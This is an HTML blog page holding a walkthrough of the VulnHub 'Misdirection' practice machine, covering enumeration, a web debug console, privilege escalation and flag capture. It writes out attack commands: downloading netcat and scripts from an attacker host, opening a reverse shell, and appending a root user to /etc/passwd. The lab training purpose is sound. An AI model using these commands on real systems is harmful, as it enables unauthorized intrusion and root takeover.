<!doctype html><html lang=en>
<head>
<meta charset=utf-8>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta http-equiv=content-language content="en">
<meta name=color-scheme content="light dark">
<meta http-equiv=content-security-policy content="upgrade-insecure-requests; block-all-mixed-content; default-src 'self'; child-src 'self'; font-src 'self' https://fonts.gstatic.com https://cdn.jsdelivr.net/; form-action 'self'; frame-src 'self'; img-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/ https://cdn.jsdelivr.net/; script-src 'self' 'unsafe-inline' https://www.google-analytics.com; prefetch-src 'self'; connect-src 'self' https://www.google-analytics.com;">
<meta name=author content="Kiel Vaughn">
<meta name=description content="Misdirection is labelled as a medium difficulty OSCP style box from VulnHub. Below are the steps I took to root this box.
First, I ran threader3000 to see what ports were open.
Next, let&rsquo;s run nmap -A p- 22,80,3306,8080 [machine ip] to further enumerate these ports.
It appears that we have both Apache and a Python HTTP server running, along with MySQL and SSH. Let&rsquo;s visit both webpages over ports 80 and 8080 and see what&rsquo;s going on.">
<meta name=keywords content="blog,cybersecurity,personal">
<meta name=twitter:card content="summary">
<meta name=twitter:title content="Misdirection - VulnHub">
<meta name=twitter:description content="Misdirection is labelled as a medium difficulty OSCP style box from VulnHub. Below are the steps I took to root this box.
First, I ran threader3000 to see what ports were open.
Next, let&rsquo;s run nmap -A p- 22,80,3306,8080 [machine ip] to further enumerate these ports.
It appears that we have both Apache and a Python HTTP server running, along with MySQL and SSH. Let&rsquo;s visit both webpages over ports 80 and 8080 and see what&rsquo;s going on.">
<meta property="og:title" content="Misdirection - VulnHub">
<meta property="og:description" content="Misdirection is labelled as a medium difficulty OSCP style box from VulnHub. Below are the steps I took to root this box.
First, I ran threader3000 to see what ports were open.
Next, let&rsquo;s run nmap -A p- 22,80,3306,8080 [machine ip] to further enumerate these ports.
It appears that we have both Apache and a Python HTTP server running, along with MySQL and SSH. Let&rsquo;s visit both webpages over ports 80 and 8080 and see what&rsquo;s going on.">
<meta property="og:type" content="article">
<meta property="og:url" content="http://www.kielvaughn.com/ctfs/2020-07-30-misdirection/"><meta property="article:section" content="ctfs">
<meta property="article:published_time" content="2020-07-30T00:00:00+00:00">
<meta property="article:modified_time" content="2020-07-30T00:00:00+00:00">
<title>
Misdirection - VulnHub · Kiel Vaughn, CISSP
</title>
<link rel=canonical href=http://www.kielvaughn.com/ctfs/2020-07-30-misdirection/>
<link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin>
<link rel=stylesheet href=/css/coder.min.708686f8ab8176e91d44fcbe488a0fe0333b94f405cf18a52383d67ba22f0ccb.css integrity="sha256-cIaG+KuBdukdRPy+SIoP4DM7lPQFzxilI4PWe6IvDMs=" crossorigin=anonymous media=screen>
<link rel=stylesheet href=/css/coder-dark.min.aa883b9ce35a8ff4a2a5008619005175e842bb18a8a9f9cc2bbcf44dab2d91fa.css integrity="sha256-qog7nONaj/SipQCGGQBRdehCuxioqfnMK7z0Tastkfo=" crossorigin=anonymous media=screen>
<link rel=icon type=image/png href=/assets/img/cissp.ico sizes=32x32>
<link rel=icon type=image/png href=/assets/img/cissp.ico sizes=16x16>
<link rel=apple-touch-icon href=/assets/img/cissp.ico>
<link rel=apple-touch-icon sizes=180x180 href=/assets/img/cissp.ico>
<meta name=generator content="Hugo 0.89.4">
</head>
<body class="preload-transitions colorscheme-dark">
<main class=wrapper>
<nav class=navigation>
<section class=container>
<a class=navigation-title href=/>
Kiel Vaughn, CISSP
</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle>
<i class="fa fa-bars fa-fw" aria-hidden=true></i>
</label>
<ul class=navigation-list>
<li class=navigation-item>
<a class=navigation-link href=/whoami/>whoami</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/certifications/>certifications</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/posts/>blog</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/ctfs/>vulnerable machine walkthroughs</a>
</li>
</ul>
</section>
</nav>
<div class=content>
<section class="container post">
<article>
<header>
<div class=post-title>
<h1 class=title>
<a class=title-link href=http://www.kielvaughn.com/ctfs/2020-07-30-misdirection/>
Misdirection - VulnHub
</a>
</h1>
</div>
<div class=post-meta>
<div class=date>
<span class=posted-on>
<i class="fa fa-calendar" aria-hidden=true></i>
<time datetime=2020-07-30T00:00:00Z>
July 30, 2020
</time>
</span>
<span class=reading-time>
<i class="fa fa-clock-o" aria-hidden=true></i>
3-minute read
</span>
</div>
<div class=tags>
<i class="fa fa-tag" aria-hidden=true></i>
<span class=tag>
<a href=/tags/misdirection/>Misdirection</a>
</span>
<span class=separator>•</span>
<span class=tag>
<a href=/tags/vulnhub/>VulnHub</a>
</span>
<span class=separator>•</span>
<span class=tag>
<a href=/tags/privilege-escalation/>privilege escalation</a>
</span>
<span class=separator>•</span>
<span class=tag>
<a href=/tags/website-enumeration/>website enumeration</a>
</span></div>
</div>
</header>
<div>
<p>Misdirection is labelled as a medium difficulty OSCP style box from <a href=https://www.vulnhub.com>VulnHub</a>. Below are the steps I took to root this box.</p>
<p>First, I ran <strong>threader3000</strong> to see what ports were open.</p>
<p><img src=/assets/img/Misdirection1.png alt="Misdirection threader3000"></p>
<p>Next, let&rsquo;s run <strong>nmap -A p- 22,80,3306,8080 [machine ip]</strong> to further enumerate these ports.</p>
<p><img src=/assets/img/Misdirection2.png alt="Misdirection nmap"></p>
<p>It appears that we have both Apache and a Python HTTP server running, along with MySQL and SSH. Let&rsquo;s visit both webpages over ports 80 and 8080 and see what&rsquo;s going on. Over port 80, we have the following:</p>
<p><img src=/assets/img/Misdirection3.png alt="Misdirection port 80 website"></p>
<p>Over port 8080, we have a default Apache page:</p>
<p><img src=/assets/img/Misdirection4.png alt="Misdirection port 8080 website"></p>
<p>Let&rsquo;s take a deeper look at the one on port 80. There is a <strong>Sign Up</strong> link under <strong>Log In</strong>. Let&rsquo;s create an account.</p>
<p><img src=/assets/img/Misdirection5.png alt="Misdirection Sign Up"></p>
<p>Unfortunately, we receive an error when attempting to register both with and without the <strong>Is Manager</strong> box checked.</p>
<p><img src=/assets/img/Misdirection6.png alt="Misdirection email error"></p>
<p>A cursory glance around the rest of the site results in not finding anything that stands out. Let&rsquo;s run <strong>gobuster dir -u http://[machine ip]/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .txt,.php</strong> to enumerate the website over port 80.</p>
<p><img src=/assets/img/Misdirection7.png alt="Misdirection gobuster port 80"></p>
<p>We are not able to login to the admin page as it will not load unless over https, and welcome/examples just look like they provide samples for web2py. Let&rsquo;s enumerate the port 8080 website next with <strong>gobuster dir -u http://[machine ip]:8080/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .txt,.php</strong>.</p>
<p><img src=/assets/img/Misdirection8.png alt></p>
<p>After looking around, there are several subfolders available, but <strong>/debug</strong> provides you with web console access.</p>
<p><img src=/assets/img/Misdirection9.png alt="Misdirection /debug"></p>
<p>Running <strong>whoami</strong> states you are currently running as <strong>www-data</strong> and <strong>sudo -l</strong> states you can run bash as the user <strong>brexit</strong></p>
<p><img src=/assets/img/Misdirection10.png alt="Misdirection sudo -l"></p>
<p>It also appears that netcat is installed. Let&rsquo;s open a shell on our attacker machine with <strong>nc -nvlp 4444</strong></p>
<p><img src=/assets/img/Misdirection11.png alt="Misdirection nc listener"></p>
<p>Back on the p0wny@shell site, the netcat that is on the victim server does not allow for -e. Let&rsquo;s serve up an http server in another terminal window on our attacker machine with <strong>python3 -m http.server</strong>.</p>
<p><img src=/assets/img/Misdirection13.png alt="Misdirection python3 http.server"></p>
<p>On the victim machine, navigate to <strong>cd /tmp</strong> and run <strong>wget http://[attacker ip]:8000/nc</strong>. Once downloaded, run <strong>chmod +x nc</strong> to make this version of netcat executable. Now, run ./<strong>nc [attacker ip] 4444 -e /bin/bash</strong> to open a reverse shell on your attacker pc.</p>
<p><img src=/assets/img/Misdirection14.png alt="Misdirection copy over nc and open reverse shell"></p>
<p>Next, run <strong>python -c &lsquo;import pty; pty.spawn("/bin/bash")'</strong> to upgrade your shell.</p>
<p><img src=/assets/img/Misdirection15.png alt="Misdirection upgrade shell"></p>
<p>Now, let&rsquo;s run <strong>sudo -u brexit /bin/bash</strong>. You should now have a shell as the <strong>brexit</strong> user.</p>
<p><img src=/assets/img/Misdirection16.png alt="Misdirection brexit user shell"></p>
<p>Now, run <strong>cd ~</strong> and <strong>ls</strong>. The user flag is in this folder. Run <strong>cat user.txt</strong> to get the user flag.</p>
<p><img src=/assets/img/Misdirection17.png alt="Misdirection user.txt"></p>
<p>Now, let&rsquo;s copy over linpeas and pspy with <strong>wget http://[attacker ip]:8000/linpeas.sh</strong> and <strong>wget http://[attacker ip]:8000/pspy64</strong>. Next, run <strong>chmod +x pspy64</strong> and <strong>chmod +x linpeas.sh</strong>.</p>
<p><img src=/assets/img/Misdirection18.png alt="Misdirection wget"></p>
<p>Next, run <strong>./linpeas.sh</strong> to enumerate the server. It appears that the brexit user can write to the <strong>/etc/passwd</strong> file.</p>
<p><img src=/assets/img/Misdirection19.png alt="Misdirection linpeas"></p>
<p>Let&rsquo;s run <strong>perl -le &lsquo;print crypt(&ldquo;test&rdquo;,&ldquo;aa&rdquo;)</strong> to get the encrypted form of the password test we need. This should give you <strong>aaqPiZY5xR5l.</strong> Next, run <strong>echo notroot:aaqPiZy5xR5l.:0:0:notroot:/root:/bin/bash &#187; /etc/passwd</strong> This will add a root user named notroot with the password test. Next, run <strong>su notroot</strong> and enter test for the password when prompted to escalate to root.</p>
<p><img src=/assets/img/Misdirection20.png alt="Misdirection root privesc"></p>
<p>Now, just run <strong>cd /root</strong>, followed by <strong>ls</strong> and then finally <strong>cat root.txt</strong> to get the final flag.</p>
<p><img src=/assets/img/Misdirection21.png alt="Misdirection root.txt"></p>
</div>
<footer>
</footer>
</article>
</section>
</div>
<footer class=footer>
<section class=container>
©
2020 -
2021
Kiel Vaughn
</section>
</footer>
</main>
<script src=/js/coder.min.03b17769f4f91ae35667e1f2a1ca8c16f50562576cf90ff32b3179926914daa5.js integrity="sha256-A7F3afT5GuNWZ+HyocqMFvUFYlds+Q/zKzF5kmkU2qU="></script>
</body>
</html>